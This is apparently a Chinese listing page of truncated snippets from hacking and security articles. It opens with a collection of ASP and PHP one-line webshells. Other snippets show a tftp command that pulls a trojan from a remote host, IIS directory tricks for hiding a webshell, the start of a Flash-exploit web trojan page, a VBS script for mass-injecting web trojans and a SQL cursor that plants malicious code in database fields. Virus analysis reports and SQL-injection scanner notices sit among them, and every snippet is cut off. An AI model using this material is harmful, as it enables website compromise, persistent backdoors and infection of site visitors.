特把经常用到的网页后门的木马整理下，如果不全请大家补全他，大家在网站混口饭吃，都不容易何必呢asp一句话木马文件常见内容<%If Request("#")<>"" Then Execute(Request("#"))%>execute(request("#"));eval(request("#"));php一句话木马<?@include($_POST["jb51"]);?><?php eval($_POST[cmd])?>...

通过HTTP协议来访问一句话木马的使用范围(我只列举了2种):1)只有数据库备份的情况数据库备份成asp文件时候，不出现“ 编译错误，缺少脚本关闭标志%>"2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快)tftp -i ip get server.exe一句话木马<%execute request("a")%>的原理:首先知道execute()函数,是用来执行asp代码的.就是负责执行我们上传的大马,将马交由asp.dll解析.上面的代码<%execute ...

那么，除了在Web开发的时候注意以外，有什么有效的工具可以对抗SQL注入攻击？今天，微软和惠普的安全部门合作发布了三个工具，分别是：微软SQL注入攻击源码扫描器：Microsoft Source Code Analyzer for SQL Injection (MSCASI)。这个工具给网站开发人员使用。是一个静态扫描ASP代码的工具，可以查找发现第一类和第二类的SQL注入攻击漏洞。工具下载地址：http://support.microsoft.com/kb/954476惠普的 Scrawlr工具。这个工具可以被网...

在选择清除木马后，电脑重启后无法进入桌面！请大家在卡巴报警时暂时千万不要将其删除！！ 如果遇到监控一直报警的可以暂时退出卡巴！ 上网搜索之后，这个现象是由于卡巴误报WININET.DLL 为木马，删除导致的现象就是进入操作系统之后进入不了桌面， 可能还导致很多应用程序无法运行，可是发现网上给出的方法并不能完全解决所有问题，因为卡巴启动时默认是隐藏主界面的！ 经过试验，现给出一个最为管用的解决方法： 首先下载附件中的 WININET.rar 文件，解压后得到WININET.DLL 并将其放在U盘中，再进行以...

1、建立非标准目录：mkdir images..\拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp通过web访问ASP木马：http://ip/images../news.asp?action=login如何删除非标准目录：rmdir images..\ /s2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:mkdir programme.asp新建1.txt文件内容：...

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马，该网马通过网页加载一个正常的FLASH文件，再在那个FLASH文件里调用嵌入恶意构造的FLASH文件，这时会导致溢出，从而可能执行任意指令。以下为调用页内容：<script>window.onerror=function(){return true;}function init(){window.status=”";}window.onload = init;if(document.cookie.indexOf(”play=”)==-1...

scan.vbecscript scan.vbe web目录程序代码：'版权信息br="************************************" & vbCrLfbr=br & "* VBS 批量挂马脚本 *" & vbCrLfbr=br & "* BY BanLG *" & vbCrLfbr=br & "*************...

以下是这两天极度猖獗的AUTO病毒最新变种的分析报告：一．行为概述该EXE是病毒下载器，它会：1） 参考系统C盘卷序列号来算出服务名，EXE 和DLL 的文件名。2） 在每一个驱动器下放置AUTO病毒autorun.inf 和自身副本auto.exe 并加系统和隐藏属性。3） 在系统system32 下放置自身副本“随机名.exe ”和释放出来的“随机名.dll” 并将它们伪装成具有隐藏属性的系统文件。4） 修改系统键值，将系统隐藏文件选项删除，造成用户无法查看隐藏起来的病毒文件。5）...

样本信息：File: login.exeSize: 25428 bytesModified: 2008年4月25日, 16:30:08MD5: 9777E8C79312F2E3D175AA1F64B07C11SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52ECRC32: 5A5622031.病毒初始化:创建互斥量HGFSMUTEX，保证系统内只有一个实例在运行2.释放如下文件或者副本%systemroot%\system32\Autorun.exe%systemroot%\...

SQL语句如下：用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）xtype=99 ntextxtype=35 textxtype=231 nvarcharxtype=167 varchar———————YD的分割——————————–DECLARE @T varchar(255),@C varchar(255)DECLARE Table_Cursor CURSOR FORSelecta.name,b.namefrom sysobjects&nbs...

还有在国外的一些机器上，什么权限都拿到了也不知道他怎么弄的，什么都不让写，好不容易写个文件没一会又改回去了，真的让人很!#$%%#%^#%^，据说就有一种软件能监视重要的文件，一旦发现更改就会给恢复过去，譬如他监视web目录的话我们就不能更改他网站的任何内容了。不过，看了很多大虾的文章，自己也略微研究了下，也总算琢磨点东西出来，不用写任何文件就可以实现将别人的页面涂改和大家经常传说的挂马等等后果，这里就给大家介绍下，那些只知道勤快的管理员也要小心了！大家知道，我们浏览网站的时候都是服务器将信息处理成Html方式再返回给我们，而我们要实现的是当客户访问的时候能改变他们浏览器的内容，使他隐蔽的执行...